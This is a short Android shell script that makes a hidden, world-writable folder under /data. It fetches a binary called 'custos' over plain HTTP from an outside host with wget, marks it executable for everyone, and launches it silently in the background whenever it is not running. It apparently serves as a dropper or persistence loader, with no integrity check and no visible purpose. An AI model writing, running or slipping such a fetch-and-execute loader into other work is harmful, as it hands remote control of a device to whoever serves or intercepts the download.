#!/system/bin/sh
MOFEI_PATH=/data/.mofei
MOFEI_CUSTOS=/data/.mofei/custos

if [ ! -d $MOFEI_PATH ]; then
	mkdir -pm 777 $MOFEI_PATH
fi

if [ ! -f $MOFEI_CUSTOS ];then
	wget http://pdl.magicef.com/work/soft/custos/custos_armv7 -O /data/.mofei/custos
fi

if [ -f $MOFEI_CUSTOS ];then
	chmod 777 /data/.mofei/custos
fi

if ! pidof custos >/dev/null 2>&1; then
	cd $MOFEI_PATH
	nohup ./custos >/dev/null 2>&1 &
fi
